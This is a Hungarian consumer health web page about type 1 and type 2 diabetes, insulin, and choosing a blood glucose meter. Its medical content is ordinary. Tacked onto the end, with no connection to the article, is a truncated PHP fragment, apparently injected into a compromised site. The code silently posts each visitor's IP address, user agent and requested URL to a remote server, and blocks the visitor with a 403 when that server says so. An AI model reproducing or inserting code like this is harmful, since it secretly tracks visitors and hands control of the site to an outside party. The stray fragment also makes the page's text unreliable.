Az egészségről

A cukorbetegségről és a vércukormérésről

A cukorbetegségről és a vércukormérésről

Mi a cukorbetegség?

A cukorbetegség kialakulásának megértéséhez  először érdemes megismerni a cukor sorsát szervezetünkben. A szőlőcukor - más néven glükóz - a sejtek legfontosabb energiaforrása. A szőlőcukor egy része a táplálékból szívódik fel az emésztőrendszerben. A többit a máj állítja elő egyéb anyagokból. A vérből a cukor bejut a szervezet sejtjeibe. A legtöbb sejttípus esetében ez a belépés inzulin segítségével történik. Az inzulint a hasnyálmirigy állítja elő. A vérben az inzulin kulcsként viselkedik, ami megnyitja azokat a képzeletbeli kis kapukat, amelyeken át a glükóz bejut a sejtekbe. Ebből az következik, hogy az inzulin jelenléte csökkenti a szőlőcukor-szintet a vérben. Amikor a vérben található cukor mennyisége lecsökken, ezzel együtt az inzulin termelődése is csökken a hasnyálmirigyből. A máj a cukor tárolójaként és előállítójaként is viselkedik: ha alacsony a vércukorszint, de nincs lehetőség táplálék felvételre, a máj felszabadítja a tárolt cukrot illetve szükség esetén újonnan is előállít. Így tartja normál tartományban a vércukorszintet.

A cukorbetegség valójában azt jelenti, hogy ez a folyamat zavart szenved. A cukor nem jut be a sejtekbe, hanem felhalmozódik a vérben. Ez akkor fordul elő, ha nem termelődik elég inzulin, vagy ha a sejtek rezisztenssé válnak az inzulin cukorbejuttató képességével szemben. Előbbi az 1-es típusú, utóbbi a kettes típusú cukorbetegség.

1-es és 2-es típusú cukorbetegség

Az 1-es típusú cukorbetegség főként fiatalokat, gyermekeket érint. A hasnyálmirigy inzulintermelő sejtjei elpusztulnak, ezért nem termelődik elég inzulin. Ekkor  kívülről bejuttatott inzulinpótlásra van szükség. Az inzulin hiánya miatt a glükóz nem jut be a sejtekbe, hanem a felhalmozódik a vérben. Ezért a sejtek éheznek. Fehérjéket és zsírokat alakítanak át cukorrá az éhezés megszüntetésére. A zsírégetés egyik melléktermékeként felszaporodó ketontestek, valamint a magas vércukorszint miatt a vizelettel távozó cukor és a nagymennyiségű folyadékvesztés kiszáradást és kómát okozhat. Leggyakoribb tünetek: sok vizelet , fogyás, szomjúság.

A 2-es típusú cukorbetegség leggyakrabban idősebb korban jelentkezik. Nem áll le az inzulintermelés, ennek ellenére nincs megfelelő inzulinhatás. Ok lehet a nem elegendő inzulinmennyiség, vagy az inzulin hatásának gyengülése. Így nem jut elég vércukor a sejtekbe. A cukorbetegség ezen típusánál van inzulin, ezért a vércukorérték lassabban emelkedik, és a tünetek is eltérőek: a kezeké s lábak zsibbadása, nem vagy nehezebben gyógyuló sebek, bőrviszketés, romló látás. Míg 1-es típusnál az okot nem ismerjük, a 2-típusnál prognosztizálható a betegség megjelenése egyes rizikótényezők esetén: pl. elhízás, magas vérnyomás, cukorbetegség a családban. A terápia is más, hiszen csak a diéta és a  gyógyszerek, a testmozgás sikertelensége esetén jön szóba az inzulinkezelés.

A diabéteszes mindig diabéteszes marad

Minden esetben leszögezendő, hogy a diabétesz egy állapot, ami leggyakrabban túlsúly talaján alakul ki, és az elsősorban a szénhidrát-anyagcserét érinti Kezeletlen vagy nem megfelelő módon kezelt formában az anyagcsere felborulásához és egyéb eltérésekhez vezet Következmények lehetnek a  magas vérnyomás, agyvérzés, szervi elváltozások, pszichés problémák. Ezek a bajok megfelelő kezeléssel megelőzhetőek, annak ellenére, hogy a diabétesz, bár javulhat, de meg nem gyógyul. A javulást jelenti ez esetben a „végső” inzulinterápia elkerülése vagy későbbi időpontban történő bevezetése és a szövődmények kivédése.  A javuló állapotú diabéteszes egyén azonban mindig diabéteszes marad.

 
Milyen a megfelelő vércukorszint mérő?

Cukorbetegség esetén  a vércukorszint mérés a mindennapi élet része. A vércukorszint mérők olyan kis, elemmel működő készülékek, melyekkel bárhol bármikor egyszerűen ellenőrizheti a vércukor szintjét. A folyamatos fejlesztéseknek és a technológiai újításoknak köszönhetően kisebbek, gyorsabbak, pontosabbak és kevesebb vért igényelnek, mint a korábban elérhető készülékek.

A vércukor méréséhez a készülékek mellett tesztcsíkokra is szükség van. Minden készülék kizárólag a saját tesztcsíkjával használható. Szükség van továbbá ujjbegyszúró eszközre is. Az ujjbegyet kell megszúrni, és a megfelelő mennyiségű  vért (általában egy csepp elég) a tesztcsíkra kenni, majd azt a készülékbe helyezni. A rendszeres ellenőrzés lehetővé teszi, hogy vércukorszintet a megfelelő tartományban tartsa. A vércukorszint a nap során ingadozik. Fontos, hogy folyamatosan a kívánt értékeknek megfelelő legyen, csak ekkor kerülhetőek el a hosszú távon rendkívül súlyos szövődmények

 A vércukorszint ellenőrzéssel az is megállapítható, ha vércukorszintje túl alacsony, mely potenciálisan veszélyes lehet. Ilyenkor mindenképpen szénhidrátot kell fogyasztania.

 

Mi alapján válassza ki az Ön számára legmegfelelőbb vércukorszint mérőt?

A legtöbb készülék pontosan méri a glükóz értéket, ám különbözhetnek típusukban, illetve az általuk kínált funkciók számában.

Mire figyeljen?

Költség – Mielőtt vércukorszint mérőt vásárolna, ellenőrizze, milyen költséggel jár a tesztcsíkok beszerzése. Előfordulhat, hogy bár a készülék olcsó, a tesztcsíkok csak borsos áron beszerezhetőek.

Mennyire egyszerű használni? – A készülék nagyobb vagy kisebb? A kisebb készülékek szállítása sokkal kényelmesebb, ám használatuk nagyobb ügyességet igényel. Vizsgálja meg a tesztcsíkok csomagolását – mennyire könnyű azt kibontani? Amennyiben rossz a látása, olyan készüléket válasszon, aminek nagyobb a kijelzője, vagy hang modullal is rendelkezik. A tesztcsíkok méretét is érdemes megvizsgálni, hiszen előfordulhat, hogy olyan kicsik, hogy nehéz rendesen kézbe venni őket.

Vérminta mennyiség – Ellenőrizze, mennyi vérminta szükséges a vércukorszint méréshez! Éjszaka is használható-e a készülék? – Vegyen olyan készüléket, mely háttérvilágítással rendelkezik.

Intelligens mérő – Vannak olyan készülékek, melyek bizonyos számú mérési eredményt a memóriájukban tárolnak.

 

true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>